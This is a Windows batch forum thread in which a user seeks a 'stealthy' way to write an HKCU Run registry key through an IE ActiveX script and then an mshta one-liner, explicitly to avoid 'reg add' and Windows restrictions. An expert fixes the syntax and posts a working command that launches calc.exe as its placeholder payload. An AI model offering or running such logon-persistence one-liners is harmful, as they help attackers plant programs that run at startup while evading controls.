Discussion forum for all Windows batch related topics.
Moderator: DosItHelp
-
hacxx
- Posts: 57
- Joined: 09 Apr 2015 13:18
#1
Post
by hacxx » 20 Sep 2020 18:19
I have this code for years that basically takes advantage of Internet Explorer to prompt the user if it wants to execute a ActiveX Object. This Object stealthly write registry keys to the system.
Code: Select all
<script> var exec = 'calc.exe'; var Shell = new ActiveXObject('WScript.Shell'); Shell.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\calc',exec); </script>
Yesterday while reviewing this forum i got the idea to improve the code above and convert to a mshta command line to be execute on cmd.exe. Basically what i was looking for is a way to write registry keys without using
reg add and bypassing any windows limited rule.
Here is the code that i wrote but it doesn't work. Can anyone spot the error?
Code: Select all
mshta vbscript:(CreateObject("WScript.Shell").RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\calc","calc.exe"))(Window.Close)
Thanks
-
aGerman
- Expert
- Posts: 4678
- Joined: 22 Jan 2010 18:01
- Location: Germany
#2
Post
by aGerman » 21 Sep 2020 11:07
At least you have to escape the comma with a caret because it's a separator for arguments in a command line. And I'm pretty sure the double backslashes are wrong in the VBS syntax. I haven't tested though.
Steffen
-
hacxx
- Posts: 57
- Joined: 09 Apr 2015 13:18
#3
Post
by hacxx » 21 Sep 2020 12:27
The double backslash works in the original code, that's why i was using them. Can you provide with a sample after you test it out.
Thanks
-
aGerman
- Expert
- Posts: 4678
- Joined: 22 Jan 2010 18:01
- Location: Germany
#4
Post
by aGerman » 21 Sep 2020 13:36
The double backslash works in the original code
The original code is JScript. Your recent code is VBScript. They are not the same thing.
Can you provide with a sample ...
What was wrong with my explanation?
Code: Select all
mshta vbscript:(CreateObject("WScript.Shell").RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\calc"^,"calc.exe"))(Window.Close)
... after you test it out.
Testing is your task.
Steffen
-
aGerman
- Expert
- Posts: 4678
- Joined: 22 Jan 2010 18:01
- Location: Germany
#6
Post
by aGerman » 22 Sep 2020 12:13
hacxx wrote: ↑22 Sep 2020 04:44
After initial testing, it didn't work. Syntax error on Char 99.
After reviewing the code i tested again and i spot the error you left on purpose
Tested now and it works out of the box in a cmd shell as well as in a batch file.
FWIW No idea what this should be even good for. A simple REG ADD would have done the job for you, but ... nevermind.
Steffen
-
aGerman
- Expert
- Posts: 4678
- Joined: 22 Jan 2010 18:01
- Location: Germany
#8
Post
by aGerman » 17 Jul 2021 17:21
Registry keys which require elevation can't be updated without admin privileges.
Steffen
(Stop promoting your site in each and every post! Otherwise, I'll ban your account.)